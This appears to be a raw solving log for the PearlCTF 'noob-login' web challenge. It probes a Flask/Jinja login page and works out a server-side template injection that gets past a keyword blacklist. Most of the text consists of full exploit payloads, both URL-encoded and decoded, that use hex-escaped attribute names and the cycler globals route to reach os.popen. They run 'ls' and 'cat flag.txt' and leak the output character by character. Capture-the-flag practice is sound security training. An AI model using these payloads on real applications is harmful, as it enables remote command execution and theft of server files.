$ https://noob-login.ctf.pearlctf.in/404
Not Found
The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

> Indicates Python Flask.

$ https://noob-login.ctf.pearlctf.in/?user=Username

Basic Username
Blah blah blah

$ https://noob-login.ctf.pearlctf.in/?user=%3B
{% set config=None%}{% set self=None%}

> Indicates Flask and Jinja.

$ https://noob-login.ctf.pearlctf.in/?user=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

> Seems to have no escape.

$ https://noob-login.ctf.pearlctf.in/?user=%7B%7BTrue%7D%7D
{% set config=None%}{% set self=None%} true}}

$ {{self}}
{% set config=None%}{% set self=None%}{{ }}

> Seems to simple replace some illegal strings with nothing...

$ https://noob-login.ctf.pearlctf.in/?user=%7B%25+%25%7D
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

> Okay, actually maybe it does not run if illegal strings occur... 

$ https://noob-login.ctf.pearlctf.in/?user=if
{% set config=None%}{% set self=None%}

> Yeah, there's a blacklist... And they set config and self to `None`.

$ https://noob-login.ctf.pearlctf.in/?user=%F0%9D%94%B0%F0%9D%94%A2%F0%9D%94%A9%F0%9D%94%A3
Basic ð”°ð”¢ð”©ð”£
Blah blah blah

> Not evaluating it directly...

$ https://noob-login.ctf.pearlctf.in/?user=%7B%25+block+header+%25%7D%7B%25+endblock+%25%7D
Basic
Blah blah blah

> The code successfully executed...

$ https://noob-login.ctf.pearlctf.in/?user=%7B%25+for+a+in+%22abc%22+%25%7Dasd%7B%25+endfor+%25%7D
Basic asdasdasd
Blah blah blah

> Yes...

$ https://noob-login.ctf.pearlctf.in/?user=%7B%25+for+a+in+%22abc%22+%25%7D%7B%25for+d+in+a*%28a%3D%3D%22a%22%29%25%7D+a+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22b%22%29%25%7D+b+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22c%22%29%25%7D+c+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22d%22%29%25%7D+d+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22e%22%29%25%7D+e+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22f%22%29%25%7D+f+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22g%22%29%25%7D+g+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22h%22%29%25%7D+h+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22i%22%29%25%7D+i+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22j%22%29%25%7D+j+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22k%22%29%25%7D+k+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22l%22%29%25%7D+l+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22m%22%29%25%7D+m+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22n%22%29%25%7D+n+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22o%22%29%25%7D+o+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22p%22%29%25%7D+p+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22q%22%29%25%7D+q+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22r%22%29%25%7D+r+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22s%22%29%25%7D+s+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22t%22%29%25%7D+t+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22u%22%29%25%7D+u+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22v%22%29%25%7D+v+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22w%22%29%25%7D+w+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22x%22%29%25%7D+x+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22y%22%29%25%7D+y+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22z%22%29%25%7D+z+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22A%22%29%25%7D+A+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22B%22%29%25%7D+B+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22C%22%29%25%7D+C+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22D%22%29%25%7D+D+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22E%22%29%25%7D+E+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22F%22%29%25%7D+F+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22G%22%29%25%7D+G+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22H%22%29%25%7D+H+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22I%22%29%25%7D+I+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22J%22%29%25%7D+J+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22K%22%29%25%7D+K+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22L%22%29%25%7D+L+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22M%22%29%25%7D+M+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22N%22%29%25%7D+N+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22O%22%29%25%7D+O+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22P%22%29%25%7D+P+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Q%22%29%25%7D+Q+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22R%22%29%25%7D+R+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22S%22%29%25%7D+S+%7B%25endfor%25%7D%7B%25+endfor+%25%7D
Basic a b c
Blah blah blah

> Print the output char by char...

$ https://noob-login.ctf.pearlctf.in/?user=%7B%25for+x%2Cy+in+cycler%7Cattr%28%22%5Cx5f%5Cx5fin%5Cx69t%5Cx5f%5Cx5f%22%29%7Cattr%28%22%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%22%29%7Cdictsort%25%7D%7B%25for+w+in+x*%28x%3D%3D%22%5Cx6fs%22%29%25%7D%7B%25for+a+in+y%7Cattr%28%22p%5Cx6fpen%22%29%28%22ls%22%29%7Cattr%28%22read%22%29%28%29%25%7D%7C%7B%25for+d+in+a*%28a%3D%3D%22a%22%29%25%7D+a+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22b%22%29%25%7D+b+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22c%22%29%25%7D+c+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22d%22%29%25%7D+d+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22e%22%29%25%7D+e+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22f%22%29%25%7D+f+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22g%22%29%25%7D+g+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22h%22%29%25%7D+h+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22i%22%29%25%7D+i+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22j%22%29%25%7D+j+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22k%22%29%25%7D+k+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22l%22%29%25%7D+l+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22m%22%29%25%7D+m+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22n%22%29%25%7D+n+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22o%22%29%25%7D+o+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22p%22%29%25%7D+p+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22q%22%29%25%7D+q+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22r%22%29%25%7D+r+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22s%22%29%25%7D+s+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22t%22%29%25%7D+t+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22u%22%29%25%7D+u+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22v%22%29%25%7D+v+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22w%22%29%25%7D+w+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22x%22%29%25%7D+x+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22y%22%29%25%7D+y+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22z%22%29%25%7D+z+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22A%22%29%25%7D+A+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22B%22%29%25%7D+B+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22C%22%29%25%7D+C+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22D%22%29%25%7D+D+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22E%22%29%25%7D+E+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22F%22%29%25%7D+F+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22G%22%29%25%7D+G+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22H%22%29%25%7D+H+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22I%22%29%25%7D+I+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22J%22%29%25%7D+J+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22K%22%29%25%7D+K+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22L%22%29%25%7D+L+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22M%22%29%25%7D+M+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22N%22%29%25%7D+N+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22O%22%29%25%7D+O+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22P%22%29%25%7D+P+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Q%22%29%25%7D+Q+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22R%22%29%25%7D+R+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22S%22%29%25%7D+S+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22T%22%29%25%7D+T+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22U%22%29%25%7D+U+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22V%22%29%25%7D+V+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22W%22%29%25%7D+W+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22X%22%29%25%7D+X+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Y%22%29%25%7D+Y+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Z%22%29%25%7D+Z+%7B%25endfor%25%7D%7C%7B%25endfor%25%7D%7B%25endfor%25%7D%7B%25endfor%25%7D
> {%for x,y in cycler|attr("\x5f\x5fin\x69t\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|dictsort%}{%for w in x*(x=="\x6fs")%}{%for a in y|attr("p\x6fpen")("ls")|attr("read")()%}|{%for d in a*(a=="a")%} a {%endfor%}{%for d in a*(a=="b")%} b {%endfor%}{%for d in a*(a=="c")%} c {%endfor%}{%for d in a*(a=="d")%} d {%endfor%}{%for d in a*(a=="e")%} e {%endfor%}{%for d in a*(a=="f")%} f {%endfor%}{%for d in a*(a=="g")%} g {%endfor%}{%for d in a*(a=="h")%} h {%endfor%}{%for d in a*(a=="i")%} i {%endfor%}{%for d in a*(a=="j")%} j {%endfor%}{%for d in a*(a=="k")%} k {%endfor%}{%for d in a*(a=="l")%} l {%endfor%}{%for d in a*(a=="m")%} m {%endfor%}{%for d in a*(a=="n")%} n {%endfor%}{%for d in a*(a=="o")%} o {%endfor%}{%for d in a*(a=="p")%} p {%endfor%}{%for d in a*(a=="q")%} q {%endfor%}{%for d in a*(a=="r")%} r {%endfor%}{%for d in a*(a=="s")%} s {%endfor%}{%for d in a*(a=="t")%} t {%endfor%}{%for d in a*(a=="u")%} u {%endfor%}{%for d in a*(a=="v")%} v {%endfor%}{%for d in a*(a=="w")%} w {%endfor%}{%for d in a*(a=="x")%} x {%endfor%}{%for d in a*(a=="y")%} y {%endfor%}{%for d in a*(a=="z")%} z {%endfor%}{%for d in a*(a=="A")%} A {%endfor%}{%for d in a*(a=="B")%} B {%endfor%}{%for d in a*(a=="C")%} C {%endfor%}{%for d in a*(a=="D")%} D {%endfor%}{%for d in a*(a=="E")%} E {%endfor%}{%for d in a*(a=="F")%} F {%endfor%}{%for d in a*(a=="G")%} G {%endfor%}{%for d in a*(a=="H")%} H {%endfor%}{%for d in a*(a=="I")%} I {%endfor%}{%for d in a*(a=="J")%} J {%endfor%}{%for d in a*(a=="K")%} K {%endfor%}{%for d in a*(a=="L")%} L {%endfor%}{%for d in a*(a=="M")%} M {%endfor%}{%for d in a*(a=="N")%} N {%endfor%}{%for d in a*(a=="O")%} O {%endfor%}{%for d in a*(a=="P")%} P {%endfor%}{%for d in a*(a=="Q")%} Q {%endfor%}{%for d in a*(a=="R")%} R {%endfor%}{%for d in a*(a=="S")%} S {%endfor%}{%for d in a*(a=="T")%} T {%endfor%}{%for d in a*(a=="U")%} U {%endfor%}{%for d in a*(a=="V")%} V {%endfor%}{%for d in a*(a=="W")%} W {%endfor%}{%for d in a*(a=="X")%} X {%endfor%}{%for d in a*(a=="Y")%} Y {%endfor%}{%for d in a*(a=="Z")%} Z {%endfor%}|{%endfor%}{%endfor%}{%endfor%}

Basic | D || o || c || k || e || r || f || i || l || e |||||||| p || y || c || a || c || h || e |||||||| a || p || p |||| p || y |||| f || l || a || g |||| t || x || t |||| g || u || n || i || c || o || r || n |||| c || o || n || f || i || g |||| p || y |||| r || e || q || u || i || r || e || m || e || n || t || s |||| t || x || t |||| D || o || c || k || e || r || f || i || l || e |||||||| p || y || c || a || c || h || e |||||||| a || p || p |||| p || y |||| f || l || a || g |||| t || x || t |||| g || u || n || i || c || o || r || n |||| c || o || n || f || i || g |||| p || y |||| r || e || q || u || i || r || e || m || e || n || t || s |||| t || x || t |||
Blah blah blah

> Hmm... I see `flag.txt`

$ https://noob-login.ctf.pearlctf.in/?user=%7B%25for+x%2Cy+in+cycler%7Cattr%28%22%5Cx5f%5Cx5fin%5Cx69t%5Cx5f%5Cx5f%22%29%7Cattr%28%22%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%22%29%7Cdictsort%25%7D%7B%25for+w+in+x*%28x%3D%3D%22%5Cx6fs%22%29%25%7D%7B%25for+a+in+y%7Cattr%28%22p%5Cx6fpen%22%29%28%22cat+flag.txt%22%29%7Cattr%28%22read%22%29%28%29%25%7D%7C%7B%25for+d+in+a*%28a%3D%3D%22a%22%29%25%7D+a+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22b%22%29%25%7D+b+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22c%22%29%25%7D+c+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22d%22%29%25%7D+d+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22e%22%29%25%7D+e+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22f%22%29%25%7D+f+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22g%22%29%25%7D+g+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22h%22%29%25%7D+h+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22i%22%29%25%7D+i+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22j%22%29%25%7D+j+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22k%22%29%25%7D+k+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22l%22%29%25%7D+l+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22m%22%29%25%7D+m+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22n%22%29%25%7D+n+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22o%22%29%25%7D+o+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22p%22%29%25%7D+p+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22q%22%29%25%7D+q+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22r%22%29%25%7D+r+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22s%22%29%25%7D+s+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22t%22%29%25%7D+t+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22u%22%29%25%7D+u+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22v%22%29%25%7D+v+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22w%22%29%25%7D+w+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22x%22%29%25%7D+x+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22y%22%29%25%7D+y+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22z%22%29%25%7D+z+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22A%22%29%25%7D+A+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22B%22%29%25%7D+B+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22C%22%29%25%7D+C+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22D%22%29%25%7D+D+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22E%22%29%25%7D+E+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22F%22%29%25%7D+F+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22G%22%29%25%7D+G+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22H%22%29%25%7D+H+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22I%22%29%25%7D+I+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22J%22%29%25%7D+J+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22K%22%29%25%7D+K+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22L%22%29%25%7D+L+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22M%22%29%25%7D+M+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22N%22%29%25%7D+N+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22O%22%29%25%7D+O+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22P%22%29%25%7D+P+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Q%22%29%25%7D+Q+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22R%22%29%25%7D+R+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22S%22%29%25%7D+S+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22T%22%29%25%7D+T+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22U%22%29%25%7D+U+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22V%22%29%25%7D+V+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22W%22%29%25%7D+W+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22X%22%29%25%7D+X+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Y%22%29%25%7D+Y+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Z%22%29%25%7D+Z+%7B%25endfor%25%7D%7C%7B%25endfor%25%7D%7B%25endfor%25%7D%7B%25endfor%25%7D
> {%for x,y in cycler|attr("\x5f\x5fin\x69t\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|dictsort%}{%for w in x*(x=="\x6fs")%}{%for a in y|attr("p\x6fpen")("cat flag.txt")|attr("read")()%}|{%for d in a*(a=="a")%} a {%endfor%}{%for d in a*(a=="b")%} b {%endfor%}{%for d in a*(a=="c")%} c {%endfor%}{%for d in a*(a=="d")%} d {%endfor%}{%for d in a*(a=="e")%} e {%endfor%}{%for d in a*(a=="f")%} f {%endfor%}{%for d in a*(a=="g")%} g {%endfor%}{%for d in a*(a=="h")%} h {%endfor%}{%for d in a*(a=="i")%} i {%endfor%}{%for d in a*(a=="j")%} j {%endfor%}{%for d in a*(a=="k")%} k {%endfor%}{%for d in a*(a=="l")%} l {%endfor%}{%for d in a*(a=="m")%} m {%endfor%}{%for d in a*(a=="n")%} n {%endfor%}{%for d in a*(a=="o")%} o {%endfor%}{%for d in a*(a=="p")%} p {%endfor%}{%for d in a*(a=="q")%} q {%endfor%}{%for d in a*(a=="r")%} r {%endfor%}{%for d in a*(a=="s")%} s {%endfor%}{%for d in a*(a=="t")%} t {%endfor%}{%for d in a*(a=="u")%} u {%endfor%}{%for d in a*(a=="v")%} v {%endfor%}{%for d in a*(a=="w")%} w {%endfor%}{%for d in a*(a=="x")%} x {%endfor%}{%for d in a*(a=="y")%} y {%endfor%}{%for d in a*(a=="z")%} z {%endfor%}{%for d in a*(a=="A")%} A {%endfor%}{%for d in a*(a=="B")%} B {%endfor%}{%for d in a*(a=="C")%} C {%endfor%}{%for d in a*(a=="D")%} D {%endfor%}{%for d in a*(a=="E")%} E {%endfor%}{%for d in a*(a=="F")%} F {%endfor%}{%for d in a*(a=="G")%} G {%endfor%}{%for d in a*(a=="H")%} H {%endfor%}{%for d in a*(a=="I")%} I {%endfor%}{%for d in a*(a=="J")%} J {%endfor%}{%for d in a*(a=="K")%} K {%endfor%}{%for d in a*(a=="L")%} L {%endfor%}{%for d in a*(a=="M")%} M {%endfor%}{%for d in a*(a=="N")%} N {%endfor%}{%for d in a*(a=="O")%} O {%endfor%}{%for d in a*(a=="P")%} P {%endfor%}{%for d in a*(a=="Q")%} Q {%endfor%}{%for d in a*(a=="R")%} R {%endfor%}{%for d in a*(a=="S")%} S {%endfor%}{%for d in a*(a=="T")%} T {%endfor%}{%for d in a*(a=="U")%} U {%endfor%}{%for d in a*(a=="V")%} V {%endfor%}{%for d in a*(a=="W")%} W {%endfor%}{%for d in a*(a=="X")%} X {%endfor%}{%for d in a*(a=="Y")%} Y {%endfor%}{%for d in a*(a=="Z")%} Z {%endfor%}|{%endfor%}{%endfor%}{%endfor%}

Basic | p || e || a || r || l |||| W |||| s |||| m || y |||| p |||| g || e |||| s |||| c || u || r |||||| e || n |||| u || g || h |||| f |||| r |||| y |||| u |||||||| p || e || a || r || l |||| W |||| s |||| m || y |||| p |||| g || e |||| s |||| c || u || r |||||| e || n |||| u || g || h |||| f |||| r |||| y |||| u |||||||
Blah blah blah

> First part... Okay actually this is annoying.

$ https://noob-login.ctf.pearlctf.in/?user=%7B%25for+x%2Cy+in+cycler%7Cattr%28%22%5Cx5f%5Cx5fin%5Cx69t%5Cx5f%5Cx5f%22%29%7Cattr%28%22%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%22%29%7Cdictsort%25%7D%7B%25for+w+in+x*%28x%3D%3D%22%5Cx6fs%22%29%25%7D%7B%25for+a+in+y%7Cattr%28%22p%5Cx6fpen%22%29%28%22cat+flag.txt%22%29%7Cattr%28%22read%22%29%28%29%25%7D%7C%7B%25for+d+in+a*%28a%3D%3D%220%22%29%25%7D+0+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%221%22%29%25%7D+1+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%222%22%29%25%7D+2+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%223%22%29%25%7D+3+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%224%22%29%25%7D+4+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%225%22%29%25%7D+5+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%226%22%29%25%7D+6+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%227%22%29%25%7D+7+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%228%22%29%25%7D+8+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%229%22%29%25%7D+9+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%5Cx5f%22%29%25%7D+%5Cx5f+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%21%22%29%25%7D+%21+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%40%22%29%25%7D+%40+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%23%22%29%25%7D+%23+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%3F%22%29%25%7D+%3F+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%24%22%29%25%7D+%24+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%25%22%29%25%7D+%25+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%5C%5C%22%29%25%7D+%5C+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22.%22%29%25%7D+.+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%27%22%29%25%7D+%27+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%27%22%27%29%25%7D+%22+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%2B%22%29%25%7D+%2B+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%5Cx3a%22%29%25%7D+%5Cx3a+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%5Cx2d%22%29%25%7D+%5Cx2d+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%3E%22%29%25%7D+%3E+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%7B%22%29%25%7D+%7B+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%7D%22%29%25%7D+%7D+%7B%25endfor%25%7D%7C%7B%25endfor%25%7D%7B%25endfor%25%7D%7B%25endfor%25%7D
> {%for x,y in cycler|attr("\x5f\x5fin\x69t\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|dictsort%}{%for w in x*(x=="\x6fs")%}{%for a in y|attr("p\x6fpen")("cat flag.txt")|attr("read")()%}|{%for d in a*(a=="0")%} 0 {%endfor%}{%for d in a*(a=="1")%} 1 {%endfor%}{%for d in a*(a=="2")%} 2 {%endfor%}{%for d in a*(a=="3")%} 3 {%endfor%}{%for d in a*(a=="4")%} 4 {%endfor%}{%for d in a*(a=="5")%} 5 {%endfor%}{%for d in a*(a=="6")%} 6 {%endfor%}{%for d in a*(a=="7")%} 7 {%endfor%}{%for d in a*(a=="8")%} 8 {%endfor%}{%for d in a*(a=="9")%} 9 {%endfor%}{%for d in a*(a=="\x5f")%} \x5f {%endfor%}{%for d in a*(a=="!")%} ! {%endfor%}{%for d in a*(a=="@")%} @ {%endfor%}{%for d in a*(a=="#")%} # {%endfor%}{%for d in a*(a=="?")%} ? {%endfor%}{%for d in a*(a=="$")%} $ {%endfor%}{%for d in a*(a=="%")%} % {%endfor%}{%for d in a*(a=="\\")%} \ {%endfor%}{%for d in a*(a==".")%} . {%endfor%}{%for d in a*(a=="'")%} ' {%endfor%}{%for d in a*(a=='"')%} " {%endfor%}{%for d in a*(a=="+")%} + {%endfor%}{%for d in a*(a=="\x3a")%} \x3a {%endfor%}{%for d in a*(a=="\x2d")%} \x2d {%endfor%}{%for d in a*(a==">")%} > {%endfor%}{%for d in a*(a=="{")%} { {%endfor%}{%for d in a*(a=="}")%} } {%endfor%}|{%endfor%}{%endfor%}{%endfor%}

Basic ||||||||||| { |||| 4 |||| \x5f |||||| \x5f |||| 4 |||||| \x5f |||| 3 |||||||| 3 || \x5f |||||| 0 |||||||| \x5f |||| 0 |||| \x5f |||| 0 |||| ? || } |||||||||||||| { |||| 4 |||| \x5f |||||| \x5f |||| 4 |||||| \x5f |||| 3 |||||||| 3 || \x5f |||||| 0 |||||||| \x5f |||| 0 |||| \x5f |||| 0 |||| ? || } |||
Blah blah blah

> This fucking takes forever to fix the bugs in the code...

